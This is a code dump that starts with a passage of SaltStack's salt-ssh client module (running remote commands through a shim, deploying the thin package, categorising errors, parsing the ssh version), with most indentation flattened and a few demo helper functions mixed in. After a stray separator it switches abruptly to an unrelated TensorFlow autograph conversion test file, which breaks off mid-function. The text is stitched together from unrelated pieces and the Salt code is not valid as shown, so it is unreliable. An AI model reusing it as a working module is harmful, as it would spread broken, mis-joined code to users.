# Pre apply changeable defaults
self.minion_opts = {
"grains_cache": True,
"log_file": "salt-call.log",
}
self.minion_opts.update(opts.get("ssh_minion_opts", {}))
if minion_opts is not None:
self.minion_opts.update(minion_opts)
# Post apply system needed defaults
self.minion_opts.update(
{
"root_dir": os.path.join(self.thin_dir, "running_data"),
"id": self.id,
"sock_dir": "/",
"fileserver_list_cache_time": 3,
}
)
self.minion_config = salt.serializers.yaml.serialize(self.minion_opts)
self.target = kwargs
self.target.update(args)
self.serial = salt.payload.Serial(opts)
self.wfuncs = salt.loader.ssh_wrapper(opts, None, self.context)
self.shell = salt.client.ssh.shell.gen_shell(opts, **args)
if self.winrm:
# Determine if Windows client is x86 or AMD64
arch, _, _ = self.shell.exec_cmd("powershell $ENV:PROCESSOR_ARCHITECTURE")
self.arch = arch.strip()
self.thin = thin if thin else salt.utils.thin.thin_path(opts["cachedir"])
def __arg_comps(self):
"""
Return the function name and the arg list
"""
fun = self.argv[0] if self.argv else ""
parsed = salt.utils.args.parse_input(
self.argv[1:], condition=False, no_parse=self.opts.get("no_parse", [])
)
args = parsed[0]
kws = parsed[1]
return fun, args, kws
def _escape_arg(self, arg):
"""
Properly escape argument to protect special characters from shell
interpretation. This avoids having to do tricky argument quoting.
Effectively just escape all characters in the argument that are not
alphanumeric!
"""
if self.winrm:
return arg
return "".join(["\\" + char if re.match(r"\W", char) else char for char in arg])
def run_ssh_pre_flight(self):
"""
Run our pre_flight script before running any ssh commands
"""
script = os.path.join(tempfile.gettempdir(), self.ssh_pre_file)
self.shell.send(self.ssh_pre_flight, script)
return self.execute_script(script)
def check_thin_dir(self):
"""
Check if the thin dir exists on the remote machine
"""
stdout, stderr, retcode = self.shell.exec_cmd(
"test -d {}".format(self.thin_dir)
)
if retcode != 0:
return False
return True
def deploy(self):
"""
Deploy salt-thin
"""
self.shell.send(
self.thin, os.path.join(self.thin_dir, "salt-thin.tgz"),
)
self.deploy_ext()
return True
def deploy_ext(self):
"""
Deploy the ext_mods tarball
"""
if self.mods.get("file"):
self.shell.send(
self.mods["file"], os.path.join(self.thin_dir, "salt-ext_mods.tgz"),
)
return True
def run(self, deploy_attempted=False):
"""
Execute the routine, the routine can be either:
1. Execute a raw shell command
2. Execute a wrapper func
3. Execute a remote Salt command
If a (re)deploy is needed, then retry the operation after a deploy
attempt
Returns tuple of (stdout, stderr, retcode)
"""
stdout = stderr = retcode = None
if self.ssh_pre_flight:
if not self.opts.get("ssh_run_pre_flight", False) and self.check_thin_dir():
log.info(
"{} thin dir already exists. Not running ssh_pre_flight script".format(
self.thin_dir
)
)
elif not os.path.exists(self.ssh_pre_flight):
log.error(
"The ssh_pre_flight script {} does not exist".format(
self.ssh_pre_flight
)
)
else:
stdout, stderr, retcode = self.run_ssh_pre_flight()
if stderr:
log.error(
"Error running ssh_pre_flight script {}".format(
self.ssh_pre_file
)
)
return stdout, stderr, retcode
log.info(
"Successfully ran the ssh_pre_flight script: {}".format(
self.ssh_pre_file
)
)
if self.opts.get("raw_shell", False):
cmd_str = " ".join([self._escape_arg(arg) for arg in self.argv])
stdout, stderr, retcode = self.shell.exec_cmd(cmd_str)
elif self.fun in self.wfuncs or self.mine:
stdout, retcode = self.run_wfunc()
else:
stdout, stderr, retcode = self.cmd_block()
return stdout, stderr, retcode
def run_wfunc(self):
"""
Execute a wrapper function
Returns tuple of (json_data, retcode)
"""
# Ensure that opts/grains are up to date
# Execute routine
data_cache = False
data = None
cdir = os.path.join(self.opts["cachedir"], "minions", self.id)
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, "ssh_data.p")
refresh = False
if not os.path.isfile(datap):
refresh = True
else:
passed_time = (time.time() - os.stat(datap).st_mtime) / 60
if passed_time > self.opts.get("cache_life", 60):
refresh = True
if self.opts.get("refresh_cache"):
refresh = True
conf_grains = {}
# Save conf file grains before they get clobbered
if "ssh_grains" in self.opts:
conf_grains = self.opts["ssh_grains"]
if not data_cache:
refresh = True
if refresh:
# Make the datap
# TODO: Auto expire the datap
pre_wrapper = salt.client.ssh.wrapper.FunctionWrapper(
self.opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
opts_pkg = pre_wrapper["test.opts_pkg"]() # pylint: disable=E1102
if "_error" in opts_pkg:
# Refresh failed
retcode = opts_pkg["retcode"]
ret = salt.utils.json.dumps({"local": opts_pkg})
return ret, retcode
opts_pkg["file_roots"] = self.opts["file_roots"]
opts_pkg["pillar_roots"] = self.opts["pillar_roots"]
opts_pkg["ext_pillar"] = self.opts["ext_pillar"]
opts_pkg["extension_modules"] = self.opts["extension_modules"]
opts_pkg["module_dirs"] = self.opts["module_dirs"]
opts_pkg["_ssh_version"] = self.opts["_ssh_version"]
opts_pkg["__master_opts__"] = self.context["master_opts"]
if "known_hosts_file" in self.opts:
opts_pkg["known_hosts_file"] = self.opts["known_hosts_file"]
if "_caller_cachedir" in self.opts:
opts_pkg["_caller_cachedir"] = self.opts["_caller_cachedir"]
else:
opts_pkg["_caller_cachedir"] = self.opts["cachedir"]
# Use the ID defined in the roster file
opts_pkg["id"] = self.id
retcode = 0
# Restore master grains
for grain in conf_grains:
opts_pkg["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts_pkg["grains"][grain] = self.target["grains"][grain]
popts = {}
popts.update(opts_pkg["__master_opts__"])
popts.update(opts_pkg)
pillar = salt.pillar.Pillar(
popts,
opts_pkg["grains"],
opts_pkg["id"],
opts_pkg.get("saltenv", "base"),
)
pillar_data = pillar.compile_pillar()
# TODO: cache minion opts in datap in master.py
data = {
"opts": opts_pkg,
"grains": opts_pkg["grains"],
"pillar": pillar_data,
}
if data_cache:
with salt.utils.files.fopen(datap, "w+b") as fp_:
fp_.write(self.serial.dumps(data))
if not data and data_cache:
with salt.utils.files.fopen(datap, "rb") as fp_:
data = self.serial.load(fp_)
opts = data.get("opts", {})
opts["grains"] = data.get("grains")
# Restore master grains
for grain in conf_grains:
opts["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts["grains"][grain] = self.target["grains"][grain]
opts["pillar"] = data.get("pillar")
wrapper = salt.client.ssh.wrapper.FunctionWrapper(
opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
self.wfuncs = salt.loader.ssh_wrapper(opts, wrapper, self.context)
wrapper.wfuncs = self.wfuncs
# We're running in the mine, need to fetch the arguments from the
# roster, pillar, master config (in that order)
if self.mine:
mine_args = None
mine_fun_data = None
mine_fun = self.fun
if self.mine_functions and self.fun in self.mine_functions:
mine_fun_data = self.mine_functions[self.fun]
elif opts["pillar"] and self.fun in opts["pillar"].get(
"mine_functions", {}
):
mine_fun_data = opts["pillar"]["mine_functions"][self.fun]
elif self.fun in self.context["master_opts"].get("mine_functions", {}):
mine_fun_data = self.context["master_opts"]["mine_functions"][self.fun]
if isinstance(mine_fun_data, dict):
mine_fun = mine_fun_data.pop("mine_function", mine_fun)
mine_args = mine_fun_data
elif isinstance(mine_fun_data, list):
for item in mine_fun_data[:]:
if isinstance(item, dict) and "mine_function" in item:
mine_fun = item["mine_function"]
mine_fun_data.pop(mine_fun_data.index(item))
mine_args = mine_fun_data
else:
mine_args = mine_fun_data
# If we found mine_args, replace our command's args
if isinstance(mine_args, dict):
self.args = []
self.kwargs = mine_args
elif isinstance(mine_args, list):
self.args = mine_args
self.kwargs = {}
try:
if self.mine:
result = wrapper[mine_fun](*self.args, **self.kwargs)
else:
result = self.wfuncs[self.fun](*self.args, **self.kwargs)
except TypeError as exc:
result = "TypeError encountered executing {}: {}".format(self.fun, exc)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
except Exception as exc: # pylint: disable=broad-except
result = "An Exception occurred while executing {}: {}".format(
self.fun, exc
)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
# Mimic the json data-structure that "salt-call --local" will
# emit (as seen in ssh_py_shim.py)
if isinstance(result, dict) and "local" in result:
ret = salt.utils.json.dumps({"local": result["local"]})
else:
ret = salt.utils.json.dumps({"local": {"return": result}})
return ret, retcode
def _cmd_str(self):
"""
Prepare the command string
"""
sudo = "sudo" if self.target["sudo"] else ""
sudo_user = self.target["sudo_user"]
if "_caller_cachedir" in self.opts:
cachedir = self.opts["_caller_cachedir"]
else:
cachedir = self.opts["cachedir"]
thin_code_digest, thin_sum = salt.utils.thin.thin_sum(cachedir, "sha1")
debug = ""
if not self.opts.get("log_level"):
self.opts["log_level"] = "info"
if (
salt.log.LOG_LEVELS["debug"]
>= salt.log.LOG_LEVELS[self.opts.get("log_level", "info")]
):
debug = "1"
arg_str = '''
OPTIONS.config = \
"""
{config}
"""
OPTIONS.delimiter = '{delimeter}'
OPTIONS.saltdir = '{saltdir}'
OPTIONS.checksum = '{checksum}'
OPTIONS.hashfunc = '{hashfunc}'
OPTIONS.version = '{version}'
OPTIONS.ext_mods = '{ext_mods}'
OPTIONS.wipe = {wipe}
OPTIONS.tty = {tty}
OPTIONS.cmd_umask = {cmd_umask}
OPTIONS.code_checksum = {code_checksum}
ARGS = {arguments}\n'''.format(
config=self.minion_config,
delimeter=RSTR,
saltdir=self.thin_dir,
checksum=thin_sum,
hashfunc="sha1",
version=salt.version.__version__,
ext_mods=self.mods.get("version", ""),
wipe=self.wipe,
tty=self.tty,
cmd_umask=self.cmd_umask,
code_checksum=thin_code_digest,
arguments=self.argv,
)
py_code = SSH_PY_SHIM.replace("#%%OPTS", arg_str)
py_code_enc = base64.encodebytes(py_code.encode("utf-8")).decode("utf-8")
if not self.winrm:
cmd = SSH_SH_SHIM.format(
DEBUG=debug,
SUDO=sudo,
SUDO_USER=sudo_user,
SSH_PY_CODE=py_code_enc,
HOST_PY_MAJOR=sys.version_info[0],
SET_PATH=self.set_path,
)
else:
cmd = saltwinshell.gen_shim(py_code_enc)
return cmd
def execute_script(self, script, extension="py", pre_dir=""):
"""
Execute a script on the minion, then delete it
"""
if extension == "ps1":
ret = self.shell.exec_cmd('"powershell {}"'.format(script))
else:
if not self.winrm:
ret = self.shell.exec_cmd("/bin/sh '{}{}'".format(pre_dir, script))
else:
ret = saltwinshell.call_python(self, script)
# Remove file from target system
if not self.winrm:
self.shell.exec_cmd("rm '{}{}'".format(pre_dir, script))
else:
self.shell.exec_cmd("del {}".format(script))
return ret
def shim_cmd(self, cmd_str, extension="py"):
"""
Run a shim command.
If tty is enabled, we must scp the shim to the target system and
execute it there
"""
if not self.tty and not self.winrm:
return self.shell.exec_cmd(cmd_str)
# Write the shim to a temporary file in the default temp directory
with tempfile.NamedTemporaryFile(
mode="w+b", prefix="shim_", delete=False
) as shim_tmp_file:
shim_tmp_file.write(salt.utils.stringutils.to_bytes(cmd_str))
# Copy shim to target system, under $HOME/.<randomized name>
target_shim_file = ".{}.{}".format(
binascii.hexlify(os.urandom(6)).decode("ascii"), extension
)
if self.winrm:
target_shim_file = saltwinshell.get_target_shim_file(self, target_shim_file)
self.shell.send(shim_tmp_file.name, target_shim_file, makedirs=True)
# Remove our shim file
try:
os.remove(shim_tmp_file.name)
except OSError:
pass
ret = self.execute_script(
script=target_shim_file, extension=extension, pre_dir="$HOME/"
)
return ret
def cmd_block(self, is_retry=False):
"""
Prepare the pre-check command to send to the subsystem
1. execute SHIM + command
2. check if SHIM returns a master request or if it completed
3. handle any master request
4. re-execute SHIM + command
5. split SHIM results from command results
6. return command results
"""
self.argv = _convert_args(self.argv)
log.debug(
"Performing shimmed, blocking command as follows:\n%s",
" ".join([str(arg) for arg in self.argv]),
)
cmd_str = self._cmd_str()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
log.trace("STDOUT %s\n%s", self.target["host"], stdout)
log.trace("STDERR %s\n%s", self.target["host"], stderr)
log.debug("RETCODE %s: %s", self.target["host"], retcode)
error = self.categorize_shim_errors(stdout, stderr, retcode)
if error:
if error == "Python environment not found on Windows system":
saltwinshell.deploy_python(self)
stdout, stderr, retcode = self.shim_cmd(cmd_str)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif error == "Undefined SHIM state":
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying thin, undefined state: {}".format(
stdout
),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
return "ERROR: {}".format(error), stderr, retcode
# FIXME: this discards output from ssh_shim if the shim succeeds. It should
# always save the shim output regardless of shim success or failure.
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if re.search(RSTR_RE, stderr):
# Found RSTR in stderr, which means the SHIM completed and the
# remaining output is from salt.
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
# RSTR was found in stdout but not stderr - which means there
# is a SHIM command for the master.
shim_command = re.split(r"\r?\n", stdout, 1)[0].strip()
log.debug("SHIM retcode(%s) and command: %s", retcode, shim_command)
if (
"deploy" == shim_command
and retcode == salt.defaults.exitcodes.EX_THIN_DEPLOY
):
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
if not self.tty:
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
return self.cmd_block()
elif not re.search(RSTR_RE, stdout):
# If RSTR is not seen in stdout with tty, then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if self.tty:
stderr = ""
else:
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif "ext_mods" == shim_command:
self.deploy_ext()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying ext_mods: {}".format(stdout),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
return stdout, stderr, retcode
def categorize_shim_errors(self, stdout_bytes, stderr_bytes, retcode):
stdout = salt.utils.stringutils.to_unicode(stdout_bytes)
stderr = salt.utils.stringutils.to_unicode(stderr_bytes)
if re.search(RSTR_RE, stdout) and stdout != RSTR + "\n":
# RSTR was found in stdout which means that the shim
# functioned without *errors* . . . but there may be shim
# commands, unless the only thing we found is RSTR
return None
if re.search(RSTR_RE, stderr):
# Undefined state
return "Undefined SHIM state"
if stderr.startswith("Permission denied"):
# SHIM was not even reached
return None
perm_error_fmt = (
"Permissions problem, target user may need " "to be root or use sudo:\n {0}"
)
def _version_mismatch_error():
messages = {
2: {
6: "Install Python 2.7 / Python 3 Salt dependencies on the Salt SSH master \n"
"to interact with Python 2.7 / Python 3 targets",
7: "Install Python 2.6 / Python 3 Salt dependencies on the Salt SSH master \n"
"to interact with Python 2.6 / Python 3 targets",
},
3: {
"default": "- Install Python 2.6/2.7 Salt dependencies on the Salt SSH \n"
" master to interact with Python 2.6/2.7 targets\n"
"- Install Python 3 on the target machine(s)",
},
"default": "Matching major/minor Python release (>=2.6) needed both on the Salt SSH \n"
"master and target machine",
}
major, minor = sys.version_info[:2]
help_msg = (
messages.get(major, {}).get(minor)
or messages.get(major, {}).get("default")
or messages["default"]
)
return "Python version error. Recommendation(s) follow:\n" + help_msg
errors = [
(
(),
"sudo: no tty present and no askpass program specified",
"sudo expected a password, NOPASSWD required",
),
(
(salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,),
"Python interpreter is too old",
_version_mismatch_error(),
),
(
(salt.defaults.exitcodes.EX_THIN_CHECKSUM,),
"checksum mismatched",
"The salt thin transfer was corrupted",
),
(
(salt.defaults.exitcodes.EX_SCP_NOT_FOUND,),
"scp not found",
"No scp binary. openssh-clients package required",
),
(
(salt.defaults.exitcodes.EX_CANTCREAT,),
"salt path .* exists but is not a directory",
"A necessary path for salt thin unexpectedly exists:\n " + stderr,
),
(
(),
"sudo: sorry, you must have a tty to run sudo",
"sudo is configured with requiretty",
),
((), "Failed to open log file", perm_error_fmt.format(stderr)),
((), "Permission denied:.*/salt", perm_error_fmt.format(stderr)),
(
(),
"Failed to create directory path.*/salt",
perm_error_fmt.format(stderr),
),
(
(salt.defaults.exitcodes.EX_SOFTWARE,),
"exists but is not",
"An internal error occurred with the shim, please investigate:\n "
+ stderr,
),
(
(),
"The system cannot find the path specified",
"Python environment not found on Windows system",
),
(
(),
"is not recognized",
"Python environment not found on Windows system",
),
]
for error in errors:
if retcode in error[0] or re.search(error[1], stderr):
return error[2]
return None
def check_refresh(self, data, ret):
"""
Stub out check_refresh
"""
return
def module_refresh(self):
"""
Module refresh is not needed, stub it out
"""
return
def lowstate_file_refs(chunks):
"""
Create a list of file ref objects to reconcile
"""
refs = {}
for chunk in chunks:
saltenv = "base"
crefs = []
for state in chunk:
if state == "__env__":
saltenv = chunk[state]
elif state == "saltenv":
saltenv = chunk[state]
elif state.startswith("__"):
continue
crefs.extend(salt_refs(chunk[state]))
if crefs:
if saltenv not in refs:
refs[saltenv] = []
refs[saltenv].append(crefs)
return refs
def salt_refs(data):
"""
Pull salt file references out of the states
"""
proto = "salt://"
ret = []
if isinstance(data, str):
if data.startswith(proto):
return [data]
if isinstance(data, list):
for comp in data:
if isinstance(comp, str):
if comp.startswith(proto):
ret.append(comp)
return ret
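# Illustrative sketch (hypothetical data, not used by salt): given a lowstate
# chunk, ``lowstate_file_refs`` collects the ``salt://`` sources per saltenv
# by delegating to ``salt_refs`` for each non-dunder key.
def _demo_lowstate_file_refs():
    chunks = [
        {
            "__env__": "base",
            "__id__": "deploy_config",
            "name": "/etc/app.conf",
            "source": "salt://app/files/app.conf",
        }
    ]
    # Expected result: {"base": [["salt://app/files/app.conf"]]}
    return lowstate_file_refs(chunks)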
def mod_data(fsclient):
"""
Generate the module arguments for the shim data
"""
# TODO, change out for a fileserver backend
sync_refs = [
"modules",
"states",
"grains",
"renderers",
"returners",
]
ret = {}
envs = fsclient.envs()
ver_base = ""
for env in envs:
files = fsclient.file_list(env)
for ref in sync_refs:
mods_data = {}
pref = "_{}".format(ref)
for fn_ in sorted(files):
if fn_.startswith(pref):
if fn_.endswith((".py", ".so", ".pyx")):
full = salt.utils.url.create(fn_)
mod_path = fsclient.cache_file(full, env)
if not os.path.isfile(mod_path):
continue
mods_data[os.path.basename(fn_)] = mod_path
chunk = salt.utils.hashutils.get_hash(mod_path)
ver_base += chunk
if mods_data:
if ref in ret:
ret[ref].update(mods_data)
else:
ret[ref] = mods_data
if not ret:
return {}
ver_base = salt.utils.stringutils.to_bytes(ver_base)
ver = hashlib.sha1(ver_base).hexdigest()
ext_tar_path = os.path.join(
fsclient.opts["cachedir"], "ext_mods.{}.tgz".format(ver)
)
mods = {"version": ver, "file": ext_tar_path}
if os.path.isfile(ext_tar_path):
return mods
tfp = tarfile.open(ext_tar_path, "w:gz")
verfile = os.path.join(fsclient.opts["cachedir"], "ext_mods.ver")
with salt.utils.files.fopen(verfile, "w+") as fp_:
fp_.write(ver)
tfp.add(verfile, "ext_version")
for ref in ret:
for fn_ in ret[ref]:
tfp.add(ret[ref][fn_], os.path.join(ref, fn_))
tfp.close()
return mods
def ssh_version():
"""
Returns the version of the installed ssh command
"""
# This function needs more granular checks and to be validated against
# older versions of ssh
ret = subprocess.Popen(
["ssh", "-V"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()
try:
        # ``ret[1]`` is bytes; decode it before parsing so that iterating the
        # version string yields characters (on Python 3, iterating bytes yields
        # integers, which would never raise the ValueError checked below).
        version_string = ret[1].split(b",")[0].split(b"_")[1].decode("ascii", "ignore")
        parts = []
        for part in version_string:
            try:
                parts.append(int(part))
            except ValueError:
                return tuple(parts)
        return tuple(parts)
except IndexError:
return (2, 0)
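# Illustrative sketch (hypothetical sample, not used by salt): ``ssh -V``
# prints something like ``OpenSSH_8.9p1 Ubuntu-3, OpenSSL ...`` on stderr.
# The parsing in ``ssh_version`` keeps the leading numeric characters of the
# version token, so the sample below yields ``(8,)``.
def _demo_parse_ssh_version(stderr_bytes=b"OpenSSH_8.9p1 Ubuntu-3, OpenSSL 3.0.2\n"):
    version_string = stderr_bytes.split(b",")[0].split(b"_")[1].decode("ascii", "ignore")
    parts = []
    for part in version_string:
        try:
            parts.append(int(part))
        except ValueError:
            break
    return tuple(parts)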
def _convert_args(args):
"""
Take a list of args, and convert any dicts inside the list to keyword
args in the form of `key=value`, ready to be passed to salt-ssh
"""
converted = []
for arg in args:
if isinstance(arg, dict):
for key in list(arg.keys()):
if key == "__kwarg__":
continue
converted.append("{}={}".format(key, arg[key]))
else:
converted.append(arg)
return converted
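# Illustrative sketch (hypothetical data, not used by salt): dict arguments
# produced by the arg parser may carry a ``__kwarg__`` marker, which
# ``_convert_args`` skips while flattening the remaining items back into
# ``key=value`` strings for the salt-ssh command line.
def _demo_convert_args():
    args = ["test.arg", "positional", {"__kwarg__": True, "timeout": 5}]
    # Expected result: ["test.arg", "positional", "timeout=5"]
    return _convert_args(args)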
|
conversion_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for conversion module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import imp
import sys
import threading
import types
import weakref
import gast
import six
from tensorflow.python.autograph import utils
from tensorflow.python.autograph.core import config
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.impl import api
from tensorflow.python.autograph.impl import conversion
from tensorflow.python.autograph.impl.testing import pybind_for_testing
from tensorflow.python.autograph.pyct import parser
from tensorflow.python.eager import function
from tensorflow.python.framework import constant_op
from tensorflow.python.keras.engine import training
from tensorflow.python.platform import test
class ConversionTest(test.TestCase):
def _simple_program_ctx(self):
return converter.ProgramContext(
options=converter.ConversionOptions(recursive=True),
autograph_module=api)
def test_is_whitelisted(self):
def test_fn():
return constant_op.constant(1)
self.assertFalse(conversion.is_whitelisted(test_fn))
self.assertTrue(conversion.is_whitelisted(utils))
self.assertTrue(conversion.is_whitelisted(constant_op.constant))
def test_is_whitelisted_tensorflow_like(self):
tf_like = imp.new_module('tensorflow_foo')
def test_fn():
pass
tf_like.test_fn = test_fn
test_fn.__module__ = tf_like
self.assertFalse(conversion.is_whitelisted(tf_like.test_fn))
def test_is_whitelisted_callable_whitelisted_call(self):
whitelisted_mod = imp.new_module('test_whitelisted_call')
sys.modules['test_whitelisted_call'] = whitelisted_mod
config.CONVERSION_RULES = ((config.DoNotConvert('test_whitelisted_call'),) +
config.CONVERSION_RULES)
class TestClass(object):
def __call__(self):
pass
def whitelisted_method(self):
pass
TestClass.__module__ = 'test_whitelisted_call'
if six.PY2:
TestClass.__call__.__func__.__module__ = 'test_whitelisted_call'
else:
TestClass.__call__.__module__ = 'test_whitelisted_call'
class Subclass(TestClass):
def converted_method(self):
pass
tc = Subclass()
self.assertTrue(conversion.is_whitelisted(TestClass.__call__))
self.assertTrue(conversion.is_whitelisted(tc))
self.assertTrue(conversion.is_whitelisted(tc.__call__))
self.assertTrue(conversion.is_whitelisted(tc.whitelisted_method))
self.assertFalse(conversion.is_whitelisted(Subclass))
self.assertFalse(conversion.is_whitelisted(tc.converted_method))
def test_is_whitelisted_tfmethodwrapper(self):
class TestClass(object):
def member_function(self):
pass
TestClass.__module__ = 'test_whitelisted_call'
test_obj = TestClass()
def test_fn(self):
del self
bound_method = types.MethodType(
test_fn,
function.TfMethodTarget(
weakref.ref(test_obj), test_obj.member_function))
self.assertTrue(conversion.is_whitelisted(bound_method))
def test_is_whitelisted_pybind(self):
test_object = pybind_for_testing.TestClassDef()
with test.mock.patch.object(config, 'CONVERSION_RULES', ()):
# TODO(mdan): This should return True for functions and methods.
# Note: currently, native bindings are whitelisted by a separate check.
self.assertFalse(conversion.is_whitelisted(test_object.method))
def test_convert_entity_to_ast_unsupported_types(self):
with self.assertRaises(NotImplementedError):
program_ctx = self._simple_program_ctx()
conversion.convert_entity_to_ast('dummy', program_ctx)
def test_convert_entity_to_ast_callable(self):
b = 2
def f(a):
return a + b
program_ctx = self._simple_program_ctx()
nodes, name, info = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertIs(info.namespace['b'], b)
def test_convert_entity_to_ast_function_with_defaults(self):
b = 2
c = 1
def f(a, d=c + 1):
return a + b + d
program_ctx = self._simple_program_ctx()
nodes, name, _ = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertEqual(
parser.unparse(fn_node.args.defaults[0],
include_encoding_marker=False).strip(), 'None')
def test_convert_entity_to_ast_call_tree(self):
def g(a):
return a
def f(a):
return g(a)
program_ctx = self._simple_program_ctx()
nodes, _, _ = conversion.convert_entity_to_ast(f, program_ctx)
f_node, = nodes
self.assertEqual('tf__f', f_node.name)
def test_convert_entity_to_ast_class_hierarchy(self):
class TestBase(object):
def __init__(self, x='base'):
self.x = x
def foo(self):
return self.x
def bar(self):
return self.x
class TestSubclass(TestBase):
def __init__(self, y):
super(TestSubclass, self).__init__('sub')
self.y = y
def foo(self):
return self.y
def baz(self):
return self.y
program_ctx = self._simple_program_ctx()
with self.assertRaisesRegex(NotImplementedError, 'classes.*whitelisted'):
conversion.convert_entity_to_ast(TestSubclass, program_ctx)
def test_convert_entity_to_ast_class_hierarchy_whitelisted(self):
class TestSubclass(training.Model):
def __init__(self, y):
super(TestSubclass, self).__init__()
self.built = False
def call(self, x):
return 3 * x
program_ctx = self._simple_program_ctx()
(import_node, class_node), name, _ = conversion.convert_entity_to_ast(
TestSubclass, program_ctx)
self.assertEqual(import_node.names[0].name, 'Model')
self.assertEqual(name, 'TfTestSubclass')
self.assertEqual(class_node.name, 'TfTestSubclass')
def test_convert_entity_to_ast_lambda(self):
b = 2
f = lambda x: b * x if x > 0 else -x
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['b'], b)
def test_convert_entity_to_ast_multiple_lambdas(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda y: b * y)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['a'], a)
def test_convert_entity_to_ast_multiple_lambdas_ambiguous_definitions(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda x: b * x)
program_ctx = self._simple_program_ctx()
with self.assertRaises(ValueError):
conversion.convert_entity_to_ast(f, program_ctx)
def test_convert_entity_to_ast_lambda_code_with_garbage(self):
# pylint:disable=g-long-lambda
f = ( # intentional wrap
lambda x: (
x # intentional wrap
+ 1),)[0]
# pylint:enable=g-long-lambda
program_ctx = self._simple_program_ctx()
(fn_node,), name, _ = conversion.convert_entity_to_ast(f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
def test_convert_entity_to_ast_nested_functions(self):
b = 2
def f(x):
def g(x):
return b * x
return g(x)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual(fn_node.name, 'tf__f')
self.assertEqual('tf__f', name)
self.assertIs(entity_info.namespace['b'], b)
def test_convert_concurrency(self):
def test_fn():
pass
generated_file_names = []
def conversion_thread():
new_f = conversion.convert(test_fn, self._simple_program_ctx())
generated_file_names.append(new_f.__code__.co_filename)
threads = tuple(
threading.Thread(target=conversion_thread) for _ in range(10))
for t in threads:
t.start()
for t in threads:
t.join()
# Races would potentially create multiple files (non-deterministically,
# but with high likelihood).
self.assertEqual(len(set(generated_file_names)), 1)
def test_convert_reentrance(self):
def test_fn():
pass
# There are no known ways to cause convert to re-enter. So we instrument
# an internal function to do that instead.
old_node_to_graph = conversion.node_to_graph
self.num_conversions = 0
def node_to_graph_wrapper(node, context):
self.num_conversions += 1
if self.num_conversions < 2:
